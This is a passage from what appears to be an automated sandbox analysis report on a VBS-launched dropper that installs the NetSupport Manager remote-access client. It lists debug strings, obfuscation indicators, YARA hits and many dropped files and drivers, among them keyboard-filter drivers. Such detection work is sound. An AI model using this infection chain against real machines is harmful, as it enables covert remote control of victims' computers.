                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: client32.exe, 00000021.00000002.115183991198.0000000006BF0000.00000040.10000000.00040000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114282443624.0000000002DF0000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000002.115176196956.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000020.00000000.114260013532.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000021.00000002.115175806998.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000021.00000000.114272266016.00000000001F2000.00000002.00000001.01000000.00000015.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpcD source: MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pcihtmlgen\Release_unicode\PCIHTMLGen.pdb source: PCIhtmlgen.dll.20.dr
                                Source: Binary string: protobuf-net.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\tcctl32.pdb source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp source: MSIF985.tmp, 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSI1387.tmp, 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI23E6.tmp, 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\htctl32.pdb source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\Release_unicode\PCICFGUI.pdb source: pcicfgui_client.exe, 00000022.00000002.114281184741.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, pcicfgui_client.exe, 00000022.00000000.114273328544.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, pcicfgui_client.exe, 00000023.00000002.114274483585.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: msvcp100.i386.pdb source: client32.exe, 00000020.00000002.115191046027.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp, client32.exe, 00000021.00000002.115191046071.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp, pcicfgui_client.exe, 00000022.00000002.114306646393.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000020.00000002.115187020346.000000006CA21000.00000020.00000001.01000000.00000019.sdmp, client32.exe, 00000021.00000002.115187219936.000000006CA21000.00000020.00000001.01000000.00000019.sdmp, pcicfgui_client.exe, 00000022.00000002.114306116329.000000006CA21000.00000020.00000001.01000000.00000019.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcichek.pdb source: client32.exe, 00000020.00000002.115191428864.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp, client32.exe, 00000021.00000002.115191432453.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp, pcicfgui_client.exe, 00000022.00000002.114307056768.00000000701B2000.00000002.00000001.01000000.0000001A.sdmp
                                Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\DllWrap.pdb source: wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B4B6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: NETSUPPORT LTD.NetSupport Ltd.url.pdb.dllpreprocessing %s source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: DisableGeolocationEnableStopClientpcicl32.pdbSSLDefCertrootcert.pemSSLCertDirRootCertsshareFilecic/setup.msicic/setup.execic/delta.zipCICshareVershareTypeInstalledBytracerecvtracesendNoAckWhenInRoomlimitcolorbitsWinHttpWiredNetworkSpeedWebSocketSSLOnlySSLDisconnectTimeoutSilentImageFilecic_lock_image.jpgImpersonateCurrentUserdetected TS feature source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: powershell.pdbUGP source: Pyyidau.vbs.exe, 00000004.00000000.113910844511.0000000000C51000.00000020.00000001.01000000.00000006.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release\pcihooks.pdb source: client32.exe, 00000021.00000002.115186530049.000000006C61A000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\cryptpak\Release\CryptPak.pdb source: client32.exe, 00000020.00000002.115186693309.000000006C9BE000.00000002.00000001.01000000.0000001B.sdmp, client32.exe, 00000021.00000002.115186891711.000000006C9BE000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\client32\release_unicode\PCICL32.pdb source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: powershell.pdb source: Pyyidau.vbs.exe, 00000004.00000000.113910844511.0000000000C51000.00000020.00000001.01000000.00000006.sdmp
                                Source: Binary string: e:\nsmsrc\nsm\1250\1250\kbfiltr\sys\objfre_wnet_amd64\amd64\nskbfltr.pdb source: winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 00000020.00000002.115185842993.000000006C8F5000.00000002.00000001.01000000.0000001D.sdmp

                                Data Obfuscation

                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                                Source: 4.2.Pyyidau.vbs.exe.9590000.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, ListDecorator.cs.Net Code: Read
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                                Source: 4.2.Pyyidau.vbs.exe.9530000.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                                Source: Yara matchFile source: 4.2.Pyyidau.vbs.exe.fc00000.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.114071601161.000000000FC00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D5490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,25_2_005D5490
                                Source: nspscr.sys.20.drStatic PE information: section name: PAGEABLE
                                Source: mfc140u.dll.20.drStatic PE information: section name: .didat
                                Source: libssl-1_1.dll.20.drStatic PE information: section name: .00cfg
                                Source: libcrypto-1_1.dll.20.drStatic PE information: section name: .00cfg
                                Source: msvcp140.dll.20.drStatic PE information: section name: .didat
                                Source: pcictl.dll.20.drStatic PE information: section name: .nsld
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA1CF1 pushad ; retn 006Bh4_2_04EA1CF2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA1CAF pushad ; retn 006Bh4_2_04EA1CE2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA1D87 pushad ; retn 006Bh4_2_04EA1DB2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_04EA1D00 pushad ; retn 006Bh4_2_04EA1D02
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeCode function: 4_2_099735EC push ds; retf 4_2_099735EF
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_006064CF push ecx; ret 25_2_006064E2
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005EDD05 push ecx; ret 25_2_005EDD18
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009464CF push ecx; ret 27_2_009464E2
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0092DD05 push ecx; ret 27_2_0092DD18
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007880C5 push ecx; ret 28_2_007880D8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 28_2_007A04BF push ecx; ret 28_2_007A04D2
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_010164CF push ecx; ret 29_2_010164E2
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FFDD05 push ecx; ret 29_2_00FFDD18
                                Source: msvcr100.dll.20.drStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIF985.tmp
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIF373.tmp
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI1387.tmp
                                Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI23E6.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\system32\drivers\nskbfltr2.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3741.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED08.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF985.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE6B9.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFCA3.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE46.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE748.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9FC.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF373.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF691.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBAA.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEDC7.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA9C.tmp
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr2.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE5EC.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF179.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF0BB.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9CD.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF314.tmp
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB6B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE98D.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF710.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA2C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF869.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\shfolder.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1387.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBEA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF2D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2955.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF8D7.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB3B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE94E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEEB5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIECC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Pyyidau.vbs.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE66A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA5C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAFB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF917.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED48.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI37C0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC1A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF149.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sysJump to dropped file
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEF23.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF10A.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\client32provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3771.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEACC.tmpJump to dropped file
